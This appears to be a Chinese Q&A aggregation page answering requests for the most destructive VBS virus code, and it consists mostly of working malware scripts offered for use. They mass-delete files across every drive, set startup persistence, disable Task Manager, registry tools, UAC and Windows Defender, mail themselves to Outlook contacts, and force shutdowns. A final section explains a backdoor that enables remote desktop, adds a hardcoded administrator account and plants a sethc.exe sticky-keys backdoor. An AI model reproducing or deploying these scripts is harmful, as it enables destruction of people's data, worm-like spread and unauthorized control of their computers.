本文目录一览:
- 1、求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。
- 2、谁能给我最全的vbs病毒代码,要破坏性的。我多给分,前提是回答满意。
- 3、vbs代码大全
- 4、求一个超毒无比的vbs代码,最好能破坏电脑和安全模式也修复不了的vbs代码。一定要超毒的。
- 5、VBS脚本恶意破坏程序代码哪个知道?详细的
- 6、解释一个VBS脚本病毒代码
求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。
那废话不说,问这个如何?不懂可以问我
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
谁能给我最全的vbs病毒代码,要破坏性的。我多给分,前提是回答满意。
那废话不说,问这个如何?不懂可以问我
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
vbs代码大全
哈哈,LS的比较搞笑
先说VBS:
我是学VB的,据说VB和VBS差不了多少,只是VBS没有主界面而已,
VB对网络的支持堪称完美,所以不少的盗号程序都选择用VB来编写,但是其代码量绝对不是我们可以在百度贴出来的,而且......等等,总之,代码贴出来是不可能了
再说代码:
LS的你别嫌他的少,他这个是无毒无害,对于对操作系统不通的童鞋来说是挺管用的
如果你觉得太少,就把这个文件在注册表里做成启动项,让它开机就启动,呵呵
如果不够你的意,就这样改:
Msgbox "您的系统已遭病毒破坏,系统5秒后将自动关机关机,请在关机后24小时重新启动。",16+4096,"Windows安全警报"
Shell "cmd/c shutdown -s -t 5"
佛祖曰:普度众生,这样就行
后面那一句代码是用来关机的,VBS代码你应该会插入把
创建个文本文档
输入代码
改后缀.txt为.vbs
双击运行即可
求一个超毒无比的vbs代码,最好能破坏电脑和安全模式也修复不了的vbs代码。一定要超毒的。
送你了
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders("startup") "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders(1) "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set ws=wscript.createobject("wscript.shell")
ws.popup "正在验证I/O接口...",3,"接口工具",vbinformation
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
if err.number0 then
On Error Goto 0
err.raise 1,"无法匹配的I/O接口,请以ADMINISTRATOR用户运行重试","Access failed (no permission)"
end if
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]脚本病毒加强版.vbs","RUNASADMIN","REG_SZ"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"
ws.run "cmd /c echo 0C:\Windows\Web\Screen\e.bmp"
Set ol=CreateObject("Out"+"look"+".Application")
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="工作报告"
Mail.Body="您好,这是今月的工作报告"
Mail.Attachments.Add(dir2"Win32system.vbs")
Mail.Send
Next
ol.Quit
ws.run "cmd /c echo Your Computer Has Been Destoryed!e.txt"
ws.run "cmd /c echo Your Computer Has Been Destoryed!c:\e.txt"
wscript.sleep 2000
ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"
ws.run "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"
ws.run "cmd /c taskkill /f /im explorer.exe"
wscript.sleep 3000
ws.run "cmd /c start explorer.exe"
wscript.sleep 2000
ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
wscript.sleep 100
set vbs=wscript.createobject("wscript.shell")
set ws=createobject("wscript.shell")
do
msgbox"你好",vbexclamation,"VIRUS"
wscript.sleep 5000
loop
VBS脚本恶意破坏程序代码哪个知道?详细的
on error resume next
Dim AutoRunProgram
Set AutoRunProgram = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name = "REG_SZ"
Key_Name = "Auto"
Key_data = "c:\windows\system32\System.vbs"
AutorunProgram.RegWrite regpathKey_Name,Key_data,Type_Name
Dim Auto
Set Auto = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name = "REG_SZ"
Key_Name = "System"
Key_data = "c:\windows\system32\SD78.look.vbs"
Auto.RegWrite regpathKey_Name,Key_data,Type_Name
Dim RunProgram
Set RunProgram = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name = "REG_SZ"
Key_Name = "Windows"
Key_data = "c:\windows\system\Fc.loH.vbs"
runProgram.RegWrite regpathKey_Name,Key_data,Type_Name
do while true
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\windows\system32\System.vbs")
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\windows\system\Fc.loH.vbs")
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\windows\system32\SD78.look.vbs")
createobject("wscript.shell").run "cmd /c del f/s/q d:\*.*",0
createobject("wscript.shell").run "cmd /c del f/s/q e:\*.*",0
createobject("wscript.shell").run "cmd /c taskkill /im explorer.exe /f",0
msgbox"系统面临一个致命错误,WINDOWS将无法完成一些重要操作。",24,“系统提示”
on error resume next
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("h:\迷你小游戏.exe.vbs")
on error resume next
set copy=createobject("scripting.filesystemobject")
copy.getfile(wscript.scriptfullname).copy("g:\迷你小游戏.exe.vbs")
i=i+1
loop
我亲自编写的脚本病毒Win32.VBS.System Parasite.A
系统寄生虫A变种
自我传播率很低,但破坏性不可想象
或者嫌麻烦你用下面的吧:
for i=1 to 100
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\windows\system32\"(100-i)".vbs")
set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\windows\"(100-i)".vbs")
Next
一打开之后就会完全死机,只能强制关电脑,再开时安全模式上不去,电脑一直显示一堆英文,好像是说找不到系统= =
具体为什么我不知道,用for命令各复制100复本到C:\windows和SYSTEM为什么会那么大的威力,10000个我都试过啊(不过只复制到同一个目录),反正是我无意间试出来的...死机炸弹
我现在在写一个新蠕虫“系统幽灵”
如果一直想要病毒的话加我的QQ吧:807164614
解释一个VBS脚本病毒代码
'容错
on error resume next
'定义一个常量 是一个注册表的键值
const HKEY_LOCAL_MACHINE = H80000002
'定义一个变量strComputer 值为.
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
strComputer "\root\default:StdRegProv")
'创建组件 是关于注册表的组件
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
'上面这段的功能是开启3389端口 也就是开启远程终端 方法是修改注册表的键值
'容错
on error resume next
'定义变量 username password
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
'这段是增加管理员 用户名是HackEr 密码是393214425
'容错
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统
总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的远程终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门
个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量
